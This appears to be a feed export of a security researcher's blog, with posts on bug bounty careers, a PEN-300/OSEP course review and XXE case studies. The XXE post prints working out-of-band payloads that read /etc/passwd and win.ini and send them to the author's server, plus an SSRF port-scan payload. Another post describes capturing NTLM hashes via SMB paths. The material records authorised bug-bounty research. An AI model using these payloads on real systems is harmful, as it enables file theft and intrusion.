Jekyll2022-05-25T16:51:32+00:00https://cinzinga.com/feed.xmlMy Cyber EndeavorsA place for me to document my cyber endeavors.cinzingaTwo Years of Bug Bounty Hunting2022-03-31T00:00:00+00:002022-03-31T00:00:00+00:00https://cinzinga.com/2-Years-Of-Bug-Bounty<p>Two years ago this month, I created my first bug bounty account on Bugcrowd. I decided to try my hand at bug bounty hunting for a number of months. As outlined in my earlier article, “100 Days of Bug Hunting” I initially decided to try bug bounty as an experiment to determine its legitimacy. That blog post can be found <a href="https://cinzinga.com/Bug-Bounty/">here</a>. Over these last two years I have consistently bug hunted most days. Throughout this time, my approach and methodology have varied greatly. In this blog post I will outline some insights and statics that I hope you will find interesting.</p>
<h2 id="about-me">About Me</h2>
<p>First, a bit about my background. When I started bug bounty hunting in early 2020, I was sophomore (second year) in college. However, I was not entirely new to the field of information security and penetration testing. My interest for the topic really kicked off mid-2019 when I began studying for cyber security certifications such as <a href="https://www.comptia.org/certifications/security">CompTIA’s Security+</a>.</p>
<p>After earning this certification, I discovered the niche world of practical, hands-on certifications. This introduced me to <a href="https://elearnsecurity.com/product/ejpt-certification/">eLearnSecurity’s eJPT</a>, an entry level pentesting certification, which I earned in mid-2019 as well. Shortly after that, I learned about <a href="https://www.offensive-security.com/pwk-oscp/">Offensive Security’s OSCP</a> certification. In late 2019 I earned this certification as well. Finally, in early 2020, I passed <a href="https://elearnsecurity.com/product/ewpt-certification/">eLearnSecurity’s eWPT</a>, an entry level web certification.</p>
<p>In early 2020, March 3rd to be exact, I listened to the Darknet Diaries Podcast with dawgyg. This story truly got me interested in bug bounty hunting. At this point, I was tired of taking certifications and wanted to test my tradecraft against real, hardened companies to see if I could hack them. Thus, March 30th of 2020, I registered on Bugcrowd and Hackerone to begin my bug bounty hunting career.</p>
<h2 id="bug-bounty-pre-requisites">Bug Bounty Pre-Requisites</h2>
<p>My advice for those still in their early days of bug bounty is as follows:</p>
<p>First, some pre-requisites for your hacking journey are an understanding of networking fundamentals. This includes common port numbers, basic subnetting, and different protocols. This information is a cornerstone of any hacker’s education. I highly recommend Professor Messer’s YouTube channel on CompTIA’s Network+.</p>
<p>Next, one should strive to have a decent understanding of the Linux command line and Bash. I personally do not hack with Linux, I use MacOS so many of the command line elements are identical. This will be important for your recon workflow (pipe, redirect, tee, etc.) and the quick installation of tools via the command line.</p>
<p>Next, I would recommend some familiarity with a programming language. You do not have to be proficient, but a general understanding of common operators, methods, etc. is helpful. In addition to this, a basic understanding of HTML/JavaScript will help with web application hacking.</p>
<p>Finally, have some sort of experience hacking web applications. Like I mentioned, I took eLearnSecurity’s eWPT certification. However, this is totally optional, <a href="https://portswigger.net/web-security">PortSwigger’s Web Academy</a> is an even more comprehensive, and FREE resource to learn web security. Moreover, things like <a href="hackerone.com/hacktivity">HackerOne’s Hacktivity</a> and other blog posts are invaluable resources to learn from.</p>
<p>At this point, throw yourself headfirst into bug bounty hunting. Sit down with your web browser and Burp Suite and start hacking. There is no substitute for hands-on-keyboard experience. There are no secret tricks or one-liners or scanning templates that will find you bugs. Success is a function of your time and your effort. Maximize both to maximize success.</p>
<h2 id="my-hacking-style">My Hacking Style</h2>
<p>Looking back over the last two years, I have seen great evolution in how I approach bug bounty hunting. I my blog post about my first 100 days of bug bounty hunting, I mentioned that I requested a 30-day Burp Suite Pro trial and hacked every day for those 30 days until I earned enough for a year’s license. In those early days I would hack 6-8 hours each day.</p>
<p>As my understanding of common web vulnerabilities increased, I found I needed to hack for less hours each day. Additionally, the number of private invites I received from my early success allowed for me to hack on more exclusive programs, thus requiring less effort to find bugs.</p>
<p>Early on, I would spend large amounts of time hacking on one single program until I understood every page. I understood where every input was reflected on all other pages. This resulted in dozens of XSS vulnerabilities. While some were duplicates, this deep understanding helped me to stand out in this program and eventually score a handful of critical findings. To this day, I still get invited to exclusive programs by this company for my participation early on.</p>
<p>For those starting out, I recommend this approach. Find a program you like and stick to it. It doesn’t matter if you keep churning out duplicates as long as you continue to learn and hone your methodology against this target. One thing I feel many entry-level hunters do is quickly hop to new programs and run standard scanners against it. While this approach can be lucrative for the fastest folks, it will often lead to disappointment and burnout for those who aren’t the fastest.</p>
<p>These days, my strategy for picking targets is generally as follows. I mainly hunt on On-Demand Bugcrowd programs. These are the programs where they tell you a set start date and time in the future so you can be ready at that time to immediate start hacking. These generally have a $10,000 - $15,000 budget and vulnerabilities are paid out on a sliding scale. I find these style programs generally have a limited scope and favor manual hacking techniques rather than automation. Additionally, on Synack I am very active hunting on the US-only targets. While I understand not everyone has access to these targets, Synack generally has a good number of fresh targets each week for everyone. Again, Synack heavily emphasizes manual hacking techniques rather than automation and widespread scanning.</p>
<p>In addition to these bug bounty programs, I focus as lot on Bugcrowd’s pentest programs (also known as CPTs and NGPTs). For those who do not know, CPTs are generally 1 - 4-week programs where you are the only tester. However, you are required to submit all vulnerabilities of P1-P5 severity in addition to providing extensive documentation as to what was tested as well as write an executive summary. Generally, I have found these programs to pay between $1500 - $5500 depending on the length of the assessment. However, you are not paid-per-vuln like you would be with a bug bounty program.</p>
<p>Similarly, NGPTs are programs where certified hackers are onboarded to look at an exclusive scope. Sometimes this scope has been in a public bug bounty before, other times it has not. The only notable difference is that with NGPTs you are paid-per-vuln in addition to a flat rate.</p>
<p>Finally, I recently joined the <a href="https://www.cobalt.io/">Cobalt Core</a> just a few months ago. Cobalt places testers on 2-week projects with 1-2 other testers. You are expected to put in ~35 hours of time and in exchange you will receive $1500 per engagement.</p>
<p>These days as I transition into a fulltime job, I am looking for some sustainable long-term options. I find myself gravitating toward CPTs and other “pentest” programs as these are less competitive than traditional bug bounty but provide a steady source of income. Of course, this is personal preference as I live in the United States, a fulltime job is often more lucrative and steadier that bug bounty hunting. This may not be the case for all counties.</p>
<h2 id="some-bug-bounty-phases-to-avoid">Some Bug Bounty Phases to Avoid</h2>
<p>Next up I wanted to talk about some common bug bounty phases you should avoid early on in your career.</p>
<p>First up avoid spamming low impact reports such as SPF/DKIM/DMARC or clickjacking. While these reports are sometimes accepted, they generally create a lot of noise and add little value to the client.</p>
<p>Somewhat related to this is vulnerability scanners like nuclei. On public programs it is very doubtful that the public templates will yield any non-duplicate bugs. If you can write your own custom templates for zero or n-days, then nuclei can be very lucrative for farming across all bug bounty programs.</p>
<p>Finally, avoid spamming messages on any platform. This includes platforms like Twitter where some users tend to beg for the payloads and writeups of others. Similarly, triagers review hundreds of reports each day, repeatedly asking them for updates will not cast a favorable light on you. Be respectful, this is a small community and reputation goes a long way.</p>
<h2 id="personal-statistics">Personal Statistics</h2>
<p>Alright, at this point I will get off my soapbox and do a bit more technical breakdown of my findings. Moving forward I hope to write more technical blogs explaining some of my findings, similar to <a href="https://cinzinga.com/XXE-Case-Studies/">this</a> article.</p>
<h4 id="bugcrowd">Bugcrowd</h4>
<p><img src="/assets/images/2years/1.png" alt="" /></p>
<p><img src="/assets/images/2years/2.png" alt="" /></p>
<p><img src="/assets/images/2years/3.png" alt="" /></p>
<h4 id="synack">Synack</h4>
<p>Statistics on Synack are bit harder to collect.</p>
<p><img src="/assets/images/2years/4.png" alt="" /></p>cinzingaTwo years ago this month, I created my first bug bounty account on Bugcrowd. I decided to try my hand at bug bounty hunting for a number of months. As outlined in my earlier article, “100 Days of Bug Hunting” I initially decided to try bug bounty as an experiment to determine its legitimacy. That blog post can be found here. Over these last two years I have consistently bug hunted most days. Throughout this time, my approach and methodology have varied greatly. In this blog post I will outline some insights and statics that I hope you will find interesting. About Me First, a bit about my background. When I started bug bounty hunting in early 2020, I was sophomore (second year) in college. However, I was not entirely new to the field of information security and penetration testing. My interest for the topic really kicked off mid-2019 when I began studying for cyber security certifications such as CompTIA’s Security+. After earning this certification, I discovered the niche world of practical, hands-on certifications. This introduced me to eLearnSecurity’s eJPT, an entry level pentesting certification, which I earned in mid-2019 as well. Shortly after that, I learned about Offensive Security’s OSCP certification. In late 2019 I earned this certification as well. Finally, in early 2020, I passed eLearnSecurity’s eWPT, an entry level web certification. In early 2020, March 3rd to be exact, I listened to the Darknet Diaries Podcast with dawgyg. This story truly got me interested in bug bounty hunting. At this point, I was tired of taking certifications and wanted to test my tradecraft against real, hardened companies to see if I could hack them. Thus, March 30th of 2020, I registered on Bugcrowd and Hackerone to begin my bug bounty hunting career. Bug Bounty Pre-Requisites My advice for those still in their early days of bug bounty is as follows: First, some pre-requisites for your hacking journey are an understanding of networking fundamentals. This includes common port numbers, basic subnetting, and different protocols. This information is a cornerstone of any hacker’s education. I highly recommend Professor Messer’s YouTube channel on CompTIA’s Network+. Next, one should strive to have a decent understanding of the Linux command line and Bash. I personally do not hack with Linux, I use MacOS so many of the command line elements are identical. This will be important for your recon workflow (pipe, redirect, tee, etc.) and the quick installation of tools via the command line. Next, I would recommend some familiarity with a programming language. You do not have to be proficient, but a general understanding of common operators, methods, etc. is helpful. In addition to this, a basic understanding of HTML/JavaScript will help with web application hacking. Finally, have some sort of experience hacking web applications. Like I mentioned, I took eLearnSecurity’s eWPT certification. However, this is totally optional, PortSwigger’s Web Academy is an even more comprehensive, and FREE resource to learn web security. Moreover, things like HackerOne’s Hacktivity and other blog posts are invaluable resources to learn from. At this point, throw yourself headfirst into bug bounty hunting. Sit down with your web browser and Burp Suite and start hacking. There is no substitute for hands-on-keyboard experience. There are no secret tricks or one-liners or scanning templates that will find you bugs. Success is a function of your time and your effort. Maximize both to maximize success. My Hacking Style Looking back over the last two years, I have seen great evolution in how I approach bug bounty hunting. I my blog post about my first 100 days of bug bounty hunting, I mentioned that I requested a 30-day Burp Suite Pro trial and hacked every day for those 30 days until I earned enough for a year’s license. In those early days I would hack 6-8 hours each day. As my understanding of common web vulnerabilities increased, I found I needed to hack for less hours each day. Additionally, the number of private invites I received from my early success allowed for me to hack on more exclusive programs, thus requiring less effort to find bugs. Early on, I would spend large amounts of time hacking on one single program until I understood every page. I understood where every input was reflected on all other pages. This resulted in dozens of XSS vulnerabilities. While some were duplicates, this deep understanding helped me to stand out in this program and eventually score a handful of critical findings. To this day, I still get invited to exclusive programs by this company for my participation early on. For those starting out, I recommend this approach. Find a program you like and stick to it. It doesn’t matter if you keep churning out duplicates as long as you continue to learn and hone your methodology against this target. One thing I feel many entry-level hunters do is quickly hop to new programs and run standard scanners against it. While this approach can be lucrative for the fastest folks, it will often lead to disappointment and burnout for those who aren’t the fastest. These days, my strategy for picking targets is generally as follows. I mainly hunt on On-Demand Bugcrowd programs. These are the programs where they tell you a set start date and time in the future so you can be ready at that time to immediate start hacking. These generally have a $10,000 - $15,000 budget and vulnerabilities are paid out on a sliding scale. I find these style programs generally have a limited scope and favor manual hacking techniques rather than automation. Additionally, on Synack I am very active hunting on the US-only targets. While I understand not everyone has access to these targets, Synack generally has a good number of fresh targets each week for everyone. Again, Synack heavily emphasizes manual hacking techniques rather than automation and widespread scanning. In addition to these bug bounty programs, I focus as lot on Bugcrowd’s pentest programs (also known as CPTs and NGPTs). For those who do not know, CPTs are generally 1 - 4-week programs where you are the only tester. However, you are required to submit all vulnerabilities of P1-P5 severity in addition to providing extensive documentation as to what was tested as well as write an executive summary. Generally, I have found these programs to pay between $1500 - $5500 depending on the length of the assessment. However, you are not paid-per-vuln like you would be with a bug bounty program. Similarly, NGPTs are programs where certified hackers are onboarded to look at an exclusive scope. Sometimes this scope has been in a public bug bounty before, other times it has not. The only notable difference is that with NGPTs you are paid-per-vuln in addition to a flat rate. Finally, I recently joined the Cobalt Core just a few months ago. Cobalt places testers on 2-week projects with 1-2 other testers. You are expected to put in ~35 hours of time and in exchange you will receive $1500 per engagement. These days as I transition into a fulltime job, I am looking for some sustainable long-term options. I find myself gravitating toward CPTs and other “pentest” programs as these are less competitive than traditional bug bounty but provide a steady source of income. Of course, this is personal preference as I live in the United States, a fulltime job is often more lucrative and steadier that bug bounty hunting. This may not be the case for all counties. Some Bug Bounty Phases to Avoid Next up I wanted to talk about some common bug bounty phases you should avoid early on in your career. First up avoid spamming low impact reports such as SPF/DKIM/DMARC or clickjacking. While these reports are sometimes accepted, they generally create a lot of noise and add little value to the client. Somewhat related to this is vulnerability scanners like nuclei. On public programs it is very doubtful that the public templates will yield any non-duplicate bugs. If you can write your own custom templates for zero or n-days, then nuclei can be very lucrative for farming across all bug bounty programs. Finally, avoid spamming messages on any platform. This includes platforms like Twitter where some users tend to beg for the payloads and writeups of others. Similarly, triagers review hundreds of reports each day, repeatedly asking them for updates will not cast a favorable light on you. Be respectful, this is a small community and reputation goes a long way. Personal Statistics Alright, at this point I will get off my soapbox and do a bit more technical breakdown of my findings. Moving forward I hope to write more technical blogs explaining some of my findings, similar to this article. BugcrowdXXE Case Studies2021-07-26T00:00:00+00:002021-07-26T00:00:00+00:00https://cinzinga.com/XXE-Case-Studies<p>As it has been some time since my last blog post, I decided I would set aside some time to write one now. The topic of this blog post is inspired by a bug I found earlier this morning on a bug bounty program.</p>
<h2 id="xml-external-entity-xxe-attacks">XML External Entity (XXE) Attacks</h2>
<p>I have always been fascinated by XXE attacks, and in this blog, I will outline some of the checks I perform when bug bounty hunting to identify and exploit these vulnerabilities.</p>
<p>While XXE vulnerabilities are rare, they are generally quite easy to exploit. Additionally, they almost always result in a high or critical severity. There are many blogs and resources that talk about what an XXE vulnerability is, so instead I will focus more on examples that I have seen. Unfortunately, I will not be able to share complete walkthroughs as many of these bugs are undisclosed.</p>
<h2 id="case-study-1-strxml-parameter">Case Study #1: strXML Parameter</h2>
<p>When hunting bugs with Burp Suite, I utilize the extension <a href="https://github.com/wagiro/BurpBounty">Burp Bounty</a>. This allows me to create custom passive and active profiles. One of the passive profiles I utilized a while back would look for XML in every HTTP request. Upon finding it, the extension would create an issue for me to investigate manually.</p>
<p><img src="/assets/images/XXE/1.png" alt="" /></p>
<p>This alerted me to quite a fun parameter one day while bug bounty hunting. A recreation of the request is shown below.</p>
<p><img src="/assets/images/XXE/2.png" alt="" /></p>
<p>That’s right, the <code class="language-plaintext highlighter-rouge">strXML</code> parameter simply took raw XML. Interestingly enough the bulk of it wasn’t even URL encoded! Not sure how this was a validly formatted HTTP request.
Sadly, I was only able to escalate this finding to an internal port scan via SSRF with a payload similar to the following:</p>
<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>strXML=<span class="cp"><?xml version%3D"1.0" encoding%3D"ISO-8859-1"?></span>
<span class="cp"><!DOCTYPE testingxxe [<!ENTITY xxe PUBLIC "xxe" "http://localhost:21/" ></span>
]>
<span class="nt"><data></span>
<span class="nt"><xxx></span>
<span class="nt"><xxx></span>194147<span class="nt"></xxx></span>
<span class="nt"></xxx></span>
<span class="nt"><identity></span><span class="ni">&xxe;</span><span class="nt"></identity></span>
<span class="nt"></data></span>
</code></pre></div></div>
<p>Then Burp Intruder was used to iterate through the top 1000 ports. The open ports returned a different content-length than closed ports.</p>
<h2 id="case-study-2-xxe-via-proprietary-filetype">Case Study #2: XXE via Proprietary Filetype</h2>
<p>I stumbled upon this next XXE completely by accident. The web site had functionality that allowed users to build “apps”. Apps could be exported to a propriety file type that I did not recognize. Upon running <code class="language-plaintext highlighter-rouge">strings</code> on one of these files I discovered it was a zip file. Upon unzipping the file, I was greeted by a beautiful site.</p>
<p><img src="/assets/images/XXE/3.png" alt="" /></p>
<p>Next, I replaced the contents of one of the XML files with the following XXE payload.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE cinzinga SYSTEM "http://poc.cinzinga.com/test.dtd">
<cinzinga>&e1;</cinzinga>
</code></pre></div></div>
<p>And the contents of <code class="language-plaintext highlighter-rouge">/test.dtd</code> hosted on my web server are shown below:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!ENTITY % p1 SYSTEM "file:///windows/win.ini">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://poc.cinzinga.com/?x=%p1;'>">
%p2;
</code></pre></div></div>
<p>Upon zipping the folder back up, and importing this app, I was greeted with the contents of <code class="language-plaintext highlighter-rouge">C:\Windows\win.ini</code> sent to my web server.</p>
<h2 id="case-study-3-xxe-via-kml-file">Case Study #3: XXE via KML File</h2>
<p>I have encountered a number of sites that take more obscure XML file types as input. Multiple times, I have achieved XXE via KML. KML is a type of XML that is specifically used for maps and geographic data.</p>
<p>To exploit these file uploads, I simply download <a href="https://developers.google.com/kml/documentation/KML_Samples.kml">a sample KML file</a> and append an XXE payload in the second line.</p>
<p>To exploit the one I identified today, I made use of a great tool developed by a close <a href="https://twitter.com/0xTib3rius">Tib3rius</a>. The tool can be found <a href="https://github.com/WhiteOakSecurity/Dynamic-DTD">here</a>.</p>
<p>This app is run with the following command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>flask run -p <port> -h <interface-ip>
</code></pre></div></div>
<p>And triggered with the corresponding payload:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<server-ip>/malicious.dtd?ext=file:///etc/passwd"> %xxe;]>
</code></pre></div></div>
<p>This promptly resulted in the contents of <code class="language-plaintext highlighter-rouge">/etc/passwd</code> send to my web server.</p>
<p><img src="/assets/images/XXE/4.png" alt="" /></p>
<h2 id="case-study-4-xxe-via-pdf-file">Case Study #4: XXE via PDF File</h2>
<p>Thus far in my bug bounty career, I have exploited XXE via PDF upload twice. In both cases, the intended functionality was a Resume upload on a careers subdomain. I can only assume that some backend software was scanning the PDFs to extract key information.</p>
<p>To generate these PDFs, I utilize <a href="https://github.com/StefanMichielse/generate_xxe_payloads">this</a> project on GitHub.</p>
<p>I utilize the following command to generate a XXE PDF payload template.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ruby oxml_xxe.rb --poc pdf -i 192.168.0.1:8000
</code></pre></div></div>
<p><img src="/assets/images/XXE/5.png" alt="" /></p>
<p>Next, we can open up the output PDF in a text editor to get a better idea of where the payload is rendered. We can see that the XXE payload is inserted on line 27.
<img src="/assets/images/XXE/6.png" alt="" /></p>
<p>Personally, the PDF payload I utilize is shown below. I have edited the default payload slightly.</p>
<p><img src="/assets/images/XXE/7.png" alt="" /></p>
<p>The external dtd is the same as shown above in this blog.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><!ENTITY % p1 SYSTEM "file:///windows/win.ini">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://poc.cinzinga.com/?x=%p1;'>">
%p2;
</code></pre></div></div>
<h2 id="case-study--xxe-via-excel-file">Case Study #?: XXE via Excel File</h2>
<p>While I have not yet obtained XXE via Word or Excel file, it is something I have a payload for and routinely check. There is a great blog <a href="https://www.4armed.com/blog/exploiting-xxe-with-excel/">here</a> that outlines the steps to develop an Excel XXE payload.</p>
<h2 id="conclusion">Conclusion</h2>
<p>While this article was brief, I hope it served to highlight some XXE vulnerabilities that I have exploited in the wild. While the bug type is not common, I have reported approximately a dozen XXE vulnerabilities in my bug bounty career. This number certainly warrants adding XXE checks to your arsenal when assessing a web app’s security.</p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.com%2FXXE-Case-Studies%2F" alt="Hits" /></p>cinzingaAs it has been some time since my last blog post, I decided I would set aside some time to write one now. The topic of this blog post is inspired by a bug I found earlier this morning on a bug bounty program.OSEP & PEN-300 Course Review2021-03-09T00:00:00+00:002021-03-09T00:00:00+00:00https://cinzinga.com/OSEP-PEN-300-Review<p>I am proud to have completed Offensive Security’s Evasion Techniques and Breaching Defenses (PEN-300) course. After successfully passing the 48-hour exam, I earned my Offensive Security Experienced Penetration Tester (OSEP) certification. This is currently the most advanced certification in Offensive Security’s penetration testing track.</p>
<h2 id="background">Background</h2>
<p>Prior to starting PEN-300, I had limited active directory exploitation experience. Through school, I had set up an AD lab which offered great insight into the structure of a domain. Additionally, I had previously passed Pentester Academy’s Certified Red Team Professional (CRTP). Since I took the version of Pentesting With Kali (PWK) that did not include AD attacks (PWKv1), I found CRTP to be the perfect preparation to help bridge the gap between PWKv1 and PEN-300.</p>
<p>As a fun aside, one of the course authors confirmed I was actually the first student to register for PEN-300!</p>
<p><img src="/assets/images/osep/1.png" alt="" /></p>
<h2 id="the-materials">The Materials</h2>
<p>Upon registering for PEN-300, student can expect to receive a ~700-page PDF as well as 19 hours of videos. The syllabus for this course is publicly available on Offensive Security’s site <a href="https://www.offensive-security.com/documentation/PEN300-Syllabus.pdf">here</a>.</p>
<p>Looking through the syllabus, a lot of the topics were very new to me and I worried I would struggle with only 90 days of lab time in addition to being a full-time student. However, I found this course to be structured in a “crawl, walk, run” format, which I greatly enjoyed! Each topic would generally be taught in the following format: history of the technique, theory of the technique, and finally exploitation using the technique. Moreover, the course instructed students on manually coding tools similar to <code class="language-plaintext highlighter-rouge">PsExec.exe</code> and <code class="language-plaintext highlighter-rouge">PowerUpSQL.ps1</code> from scratch in C# to better understand the underlying mechanisms of the attack. While I had minor experience in C/C++ (“Hello World” level), I had never coded in C#. By the end of the course, I was comfortable extrapolating upon the code taught in the course to write my own SQL exploitation tool and undetectable C# shellcode runners.</p>
<p>Once the course moved into some of the more esoteric chapters (Advanced AV Evasion, Kiosk Breakouts, etc.) I found it highly advantageous to watch the videos in addition to following along in the PDF. Generally, the videos are just a narrator reading through the PDF verbatim; however, they have the added benefit of getting to see another person go through the motions. So, if you are a visual learner like me, sometimes it is easier to watch someone use WinDbg rather than reading text instructions on how to use it.</p>
<p>Overall, I found the course materials to be a tremendous reference. While most of the material is nothing new and can be found in many referenced blog posts, I found extreme value in having them all aggregated and distilled down into one PDF reference. Moreover, each chapter had a personal (non-shared) lab to practice the attacks and techniques in. I highly recommend taking the time to create the custom C# code and work through the exercises for each chapter. In addition to this, take the time to try out the “Extra Mile” activities, although be mindful that many of the coding ones can be done on your own time and VM to avoid using up your lab time.</p>
<h2 id="the-labs">The Labs</h2>
<p>In this section I will talk about the six “challenge” labs at the end of the course. These labs are also private so each student does not have to deal with interruptions other students may create in a shared active directory network.</p>
<p>The first three labs are designed to drill specific skills throughout the course. They are very focused and involve 1-2 major techniques so students can practice chaining attacks in a more open environment. With these first three labs, the paths are generally pretty clear, and the emphasis is on improving one’s tradecraft.</p>
<p>Labs four through six are where the student is encouraged to struggle, learn, and overcome more challenging and realistic scenarios. Each scenario challenges students to master new initial foothold and lateral movement techniques while reinforcing the common fundamentals of pivoting and post-exploitation enumeration. Unlike other AD labs I have done, there are no CTF-y games of “find the file” to pivot; the majority attack and techniques are covered in the course and improve one’s own knowledge. Make sure you take good notes and understand the “why” each time you get stuck and need to reach out for help or a nudge (join the <a href="https://discord.gg/ABmvaUUEyR">InfoSec Prep discord</a> if you want to chat with other students). The labs are a reasonable and wholistic review of all the techniques taught throughout the course; however, they are not all encompassing.</p>
<h2 id="general-questions">General Questions</h2>
<p>Before I (briefly) talk about the exam and my experience, I will answer some questions asked by friends in the InfoSec Prep discord server.</p>
<p>Q. Overall enjoyment of the course?<br />
A. I loved the course! I found it way more enjoyable than OSCP (perhaps that is because I am more into information security now than I was then?) Regardless, I consider OSCP to be a gateway certification that opens the floodgates to greater learning. This certification was definitely the best that I have taken since my OSCP.</p>
<p>Q. Any Win32 APIs taught in the course?<br />
A. Yes! This course was the first time I had ever heard of the Win32 APIs (I am a Mac user) and it was a nice introduction. The course material certainly gave me enough experience to go forth on my own and interact with these APIs with C# code.</p>
<p>Q. Favorite and least favorite topics?<br />
A. The material such as coding malicious macros and kiosk escapes was definitely the most fun for me, but at the same time probably impractical on many penetration tests. However, I still thoroughly enjoyed it. There were definitely some moments in the AV evasion chapters that it got slow to work through, but in the end the knowledge was invaluable!</p>
<p>Q. What makes PEN-300 a “300” level course compared to PEN-200(PWK)?<br />
A. PWK (PEN-200) is an introductory course to penetration testing. In addition to teaching the basics of many tools (nmap, sqlmap, hashcat, etc.) it teaches students how to think like a penetration tester. By that I mean it teaches students to enumerate, research, enumerate more, and finally exploit. PEN-300 is more advanced than that, it assumes all those initial foothold and privileges escalation skills are a pre-requisite. Beyond the course, it encourages students to exercise creativity based off previous research to go forth and pioneer new techniques and vulnerability research. The tools taught in PEN-300 are not timeless, but the techniques are.</p>
<p>Q. How much time and effort was spent on each module?<br />
A. The entire course took me approximately 2 months to get through. I was fortunate to have a lot of time over the holidays (December/ January) to work through the material and take detailed notes. While the first 15-16 modules are not strictly AD attacks, I would advise against skipping them to get to the AD stuff faster. A lot of the tradecraft taught in those chapter is important to understanding the course material. Almost everything builds upon the previous chapter and skipping around willy-nilly is not conducive to a positive learning experience.</p>
<p>Q. Did you have to learn much on your own, outside of the course?<br />
A. Almost nothing! As previously stated, I only did CRTP prior to beginning OSEP. Once I completed all the material in the labs in about 60 of my 90 days, I actually did start HTB’s Offshore labs; however, I did not enjoy it as much. It was also difficult going back to shared labs after being in the PEN-300 labs. Moreover, I enjoyed the explanation that comes with the PEN-300 course materials. I solely relied on my own notes from the PDF, videos, and labs to crack the exam.</p>
<p>Q. Was Meterpreter your go-to payload throughout the course or did you utilize other tools / C2s?
A. Yes! I actually came to love Meterpreter throughout this course. I exclusively used Meterpreter shellcode in my PowerShell and C# shellcode runners. In a future blog post I will outline some of the niche features I discovered in Meterpreter throughout this course!</p>
<p>Q. How did this course fit within the education process of a novice pentester?<br />
A. While I cannot fully answer this question (as I am not a professional pentester), I believe that this course is quality education for any aspiring pentester. It is often said that OSCP will get your foot in the door for pentesting, but I believe this course will get you to the top of the list for pentesting applications. Again, I am still currently a student so I cannot answer this question with full confidence, but this certification certainly will not hurt your career!</p>
<p>Q. 60 versus 90 days?<br />
A. While I completed all of the course work in approximately 60 days, this track is not for everyone. I am currently a college student and I was blessed to have a few weeks off in December/ January that enabled me to swiftly complete the material and labs.</p>
<p>Q. Tell us about your exam experience already!!<br />
A. Okay! Go to the next section.</p>
<h2 id="the-exam">The Exam</h2>
<p>Since this exam is still very new, I am hesitant to talk much about it. However, I will share some brief thoughts as well as statistics from my own attempt. I found the exam to be very fair. That being said I <em>highly</em> recommend having gone through the PDF and exercises (if not the extra mile exercises) before taking it. Just because an attack is or is not in the labs does not mean it will or will not be in the exam. However, if you understand each attack in the course and understand each attack in the labs, I have full confidence you can pass the exam. I found the exam to be tough but fair. Moreover, the exam offers multiple ways to pass, a luxury that is not afforded in any of the challenge labs.</p>
<p>Below are some statistics from my own exam attempt:</p>
<ul>
<li>Started at 10AM</li>
<li>Passing points (100pts) in 9 hours</li>
<li>Achieved desired objective (secret.txt) in 10.5 hours</li>
<li>Submitted report (~65) pages, the next day</li>
<li>Received confirmation of pass via email approximate 36 hours after submitting report</li>
</ul>
<p><img src="/assets/images/osep/2.png" alt="" /></p>
<h2 id="conclusion">Conclusion</h2>
<p>Well, I hope you have enjoyed reading about my PEN-300 course and exam experience. If you have any further questions I can be reached via Twitter/ LinkedIn via my links on the left side of this page, otherwise you can find me in the <a href="https://discord.gg/ABmvaUUEyR">InfoSec Prep discord</a> under the username <code class="language-plaintext highlighter-rouge">Homebrewer</code>. Thanks for reading!</p>
<p><img src="https://hitcounter.pythonanywhere.com/count/tag.svg?url=https%3A%2F%2Fcinzinga.com%2FOSEP-PEN-300-Review%2F" alt="Hits" /></p>cinzingaI am proud to have completed Offensive Security’s Evasion Techniques and Breaching Defenses (PEN-300) course. After successfully passing the 48-hour exam, I earned my Offensive Security Experienced Penetration Tester (OSEP) certification. This is currently the most advanced certification in Offensive Security’s penetration testing track.Bug Hunting Thoughts & Statistics2021-02-15T00:00:00+00:002021-02-15T00:00:00+00:00https://cinzinga.com/Bug-Bounty-Thoughts<p>Today marks a huge personal milestone in my bug bounty hunting career. I have achieved an all-time ranking of top 100 on Bugcrowd. This accomplishment comes just 11 months after first creating an account on the Bugcrowd platform. In this blog post I will endeavor to highlight a few things I have learned along the way. This blog post will contain some insights into the types and number of bugs I have submitted as well as any miscellaneous tips I think of while writing this.</p>
<h2 id="hack-for-fun">Hack for Fun</h2>
<p>The first point I would like to emphasize is the fun and learning involved in hacking. In my opinion, going into bug hunting with the sole desire to make money is unadvisable. I first started bug hunting after finishing eLearn Security’s web application pentester certification and decided I wanted to try hacking on real websites. I’ve learned so much more doing bug hunting than I have in any certification (and as an added bonus I get paid to learn this way rather than paying to learn)!</p>
<h2 id="be-creative">Be Creative</h2>
<p>The next point I want to touch on is creativity. As I have delved deeper into the bug bounty community, I see an evident issue with creativity. What I mean by this is that so many aspiring hunters are focused on finding their first bug that they constantly flock to the newest tool or run the newest “one-liner” they see on Twitter. This is the wrong approach, instead try thinking outside of the box, fuzz parameters differently, try to break things! Once you make the website act funny you can dig deeper and try to invoke a security issue.</p>
<p>An example of this I’ve encountered is SMB SSRF. Everyone knows the basic premise of SMB is to induce the web server to make an outbound HTTP request. I was looking at a program with a very tempting <code class="language-plaintext highlighter-rouge">uriPath=</code> parameter but was unable to achieve an HTTP request despite trying numerous bypasses. Out of curiosity I tried <code class="language-plaintext highlighter-rouge">uriPath=\\c2.mk\share</code> and immediate received the Net-NTLMv2 hash from the ASPX server on my VPS running Responder. This is not something I have commonly read about, but I proceeded to find it in six other parameters on this program. They were very clearly blocking outbound HTTP traffic but allowed outbound SMB traffic.</p>
<h2 id="dedication">Dedication</h2>
<p>Bug bounty is no different than anything else in life. You have to work hard if you want to see progress and achieve positive results. There is no such thing as a free lunch, you will have to learn and understand web application attacks and exploits, then you will have to fight and compete with thousands of other bug hunters just get your first accepted bug. There is no substitute for hard work and hours spent practicing. Sit down and start today if you want to progress tomorrow.</p>
<p><br />
I may add future ramblings here in the future ¯_(ツ)_/¯</p>
<h2 id="statistic">Statistic</h2>
